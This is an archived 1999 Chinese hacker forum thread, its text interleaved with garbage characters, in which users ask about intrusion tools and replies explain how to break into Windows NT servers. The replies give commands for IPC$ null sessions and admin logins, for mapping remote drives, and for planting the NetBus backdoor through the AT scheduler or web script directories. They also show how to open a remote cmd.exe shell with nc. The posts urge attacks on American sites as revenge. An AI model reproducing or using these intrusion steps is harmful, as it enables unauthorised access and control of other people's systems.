《版主页黑客工具和文章的几个问题》中提到:
6 R5 S/ i* p" n7 R1 m: {请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
+ J. i4 ?8 J2 q# R2 u/ i> 我的机子MMX166,WIN98,2。5G,32M内存。
9 q3 W- n4 q+ S/ S" U* Y ]) W% F3 V; H3 _% P; n. N
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
0 r1 c- [2 }1 ^- M- K P5 \你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
& g$ b; [% e/ Y% a其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:" \, \ i( P3 ^* n+ y% t. D% L, e
net use \\111.111.111.111\ipc$ "" /user:""+ X/ \& `/ G2 A
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:6 g T% e6 a8 D h
net view \\111.111.111.1117 ~ |% c9 F6 k+ C
当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
) P& Y, n0 d1 o% G) L1 x3 snet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"9 \ H: s* a7 _' ?9 N4 G
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:! H0 i4 N% h/ |" @8 q
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
' X2 s& P U7 dnet use x: \\111.111.111.111\c$
% N9 O: @3 M7 X' i& `) @7 Z9 Hnet use y: \\111.111.111.111\d$
$ Y! {5 \% M; [这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
) ~/ e8 q' @ w8 M+ W) [9 \; f5 t2、管理目标NT的用户:
7 L2 S/ X5 o3 g: n' y6 k& X从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
/ t2 }! u! r1 } J" f) R键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
6 ]+ f ~5 e9 `) y3、管理目标NT的服务
& B6 W# l7 o0 W5 B# n e选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
1 t$ p9 P. s, Y8 u这样你可以管理目标NT上的服务,共享目录
: t& _4 n! n8 z8 c8 b4、IIS管理
9 C, u, }, r* O& G6 M% p3 b+ S8 e选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
) I1 `. S& E# S6 u目标NT的FTP、WWW服务你就可以重新配置 m2 a i% ?% f# q& U# l
5、事件管理0 z$ `7 H; z& d- }
“事件查看器”->连接到服务器->111.111.111.111
8 \- |, h1 a( U u
3 @2 V$ a5 m7 A" i还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
! w/ X, n! O& l0 P q0 [' g% e! {5 U6 r ~+ ^' U% e& ]% @6 N! b
当然,98,95也能做一些事情,但很麻烦,比如:0 a/ F& p) D2 ?- m; h. P7 N
net use \\111.111.111.111\ipc$
$ d7 R6 @* v6 O) \net use z: \\111.111.111.111\d$' n( g! [- i& K% W/ |" r% N7 @. L/ ^2 ?
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等/ o6 b9 u' }2 P& s, r
; t3 ^- p1 L. i
我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!/ H- l0 p p; i' x9 U
这样,你还可以了解目标机器上能有什么东东供你去用!
9 U" J2 z5 c2 ?) k2 p+ ^
d X! S9 d/ }9 Q1 X
( h5 F Q' ~5 b: k--------------------------------------------------------------------------------1 m! H( o. ]3 Q `; h
0 A* P7 f9 z0 G5 n
>quack于1999-06-12,23:37:445 P8 o6 L4 t% _1 t( y
在大作《几个有关黑的问题》中提到:3 p7 P& m4 Y+ g
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。9 w( r0 f0 |: h% Y& J
. S% {# q; m0 C9 @0 {5 x" r
killusa于1999-06-13,03:25:15( p8 W) n' w2 m5 B' X
在大作《Re: 几个有关黑的问题》中提到:2 n: `7 R6 G$ D5 y
% ^6 a9 s7 x/ Q7 m9 W1 q/ i
letmein.exe 暂时没有mypwd参数,十分抱歉: g! P3 D) H8 @) ^+ p
pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。6 R2 q7 f9 q* Y5 T# L0 q
" f$ D$ n' c M2 i4 K2 U+ m; ^# _
Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的8 K# T/ ]# U! E; b% Z* C
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
" y& \$ m; F& u! Z, M1 d$ Y: h9 ^6 ~3 }! ^. \ v" L4 q4 _& ?
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
8 u1 r" k, u" t. _: S8 F. l) K: ^$ V9 M; y
C:\>net start schedule
, s0 Q0 ?8 K, J% ?! i1 m" s4 hSchedule 正在启动服务.....5 V2 }% r- R5 m/ O0 O
Schedulw 服务启动成功。9 G" H- w0 r1 C; y+ t* o% b
C:\>at /?0 p, S" X' I- r5 Q6 n
AT 命令排定在特定的日期和时间运行某些命令和程序。 k k# ^: W+ @
运行 AT 命令之前必须先启动 Schedule 服务。
' p! o" K; M! C, j
: v* p# Z z( t/ |/ T8 ZAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
7 D1 F( w: }1 ]9 }. i0 ?AT [\\computername] time [/INTERACTIVE]+ W3 Y1 v7 c1 ?
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"0 a% H# Q% |) W/ `2 S5 R
; ?& G, n& @% e: U5 `% T2 c\\computername 指定远程计算机。 如果省略这个参数9 K4 c1 R; Q3 S
命令会被排定在本机上运行。
( i* m, S5 {1 ^- K" mid 指定给排定进度命令的识别号。* U+ d, {2 j- @+ y
0 M! ?' X6 }) Q& v/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。1 E8 G# p* b4 H5 R" s
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
7 v% C/ ?1 s. V6 j* ?6 gtime 指定命令运行的时间。" w) E b+ g% D, ]
/interactive 允许作业在运行时,与用户通过桌面交互。3 v6 z5 |8 }, @9 q6 g8 \
( h* {5 l% I7 n w8 d
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。( z8 [- H/ b: R6 ~ ]+ u! y7 W! Z! x
如果省略日期,则默认为在每月的本日运行。
% x4 |2 @* @; |3 ?* V* y, Y) N- y& d" g4 ^' r2 Y
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
" g6 K& |% p- L! _) ^* M7 q% ~
6 e3 X; [* T& w) b6 Y& y! ~/ w+ q# Z"command" 准备运行的 Windows NT 命令或批处理文件。/ S1 y& A) R1 `3 r
/ n# z" r R. q' X$ ?0 V/ C, H, m
C:\> x: W9 D7 @, {6 r
# J- T* Z7 U, Z' @知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
5 D2 _/ }# H) \7 V1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
2 S) l P1 F7 O8 h5 p! d& l2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start) C& s8 \3 [2 }5 Y# E7 X
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
I8 F! \: S1 i, gat \\x.x.x.x 00:00 ntsrv.exe /port:643216 g/ T3 p, t* f% F& [% L+ k
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:, g8 E+ D- }- U; G: s2 y) U$ j
Microsoft(R) Windows NT(TM)8 W. X2 p2 Q. x6 q
(C) Copyright 1985-1996 Microsoft Corp.( B# ~2 z8 z' \9 J0 K
C:\>
- `& {2 m/ Z% w5 ]# z6 ~
2 L& V5 y, o" W5 H4 v2、利用web启动ntsrv.exe或其他程序在目的服务器6 \: f; f* L# R1 g3 f& i
$ [2 l" v4 g: }1 [3 T
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
! m5 c" |+ S8 N- `# r+ e. Vhttp://x.x.x.x/scripts/ntsrv.exe /port:64321
$ L E; J+ ~/ R: F或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
# x) j) M4 _5 o' b1 k该程序就启动了9 ~. L! A$ M' f& Z
% b" m" A F( T
我只提这几中方法!
& v# _3 E" c! s" Q. h要成功,必须打好基础工,对操作系统充分了解!( \: i6 j* l) C; b$ n% B4 G- U/ P
! d( S! P5 U$ Y1 @* V
|